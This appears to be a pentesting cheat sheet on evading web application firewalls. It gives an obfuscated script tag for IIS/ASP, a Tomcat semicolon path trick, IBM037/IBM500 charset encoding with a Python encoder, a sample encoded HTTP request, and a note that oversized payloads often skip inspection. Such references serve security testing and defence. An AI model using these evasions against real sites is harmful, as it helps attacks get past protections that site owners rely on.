WAF Bypass
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037
##Python code
import urllib
s = 'payload'
print(urllib.parse.quote_plus(s.encode("IBM037")))
## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
It's common in cloud based WAFs that if the payload is bigger than X size, the request won't be checked by the WAF. You can simply use that to bypass them.
Last modified 4d ago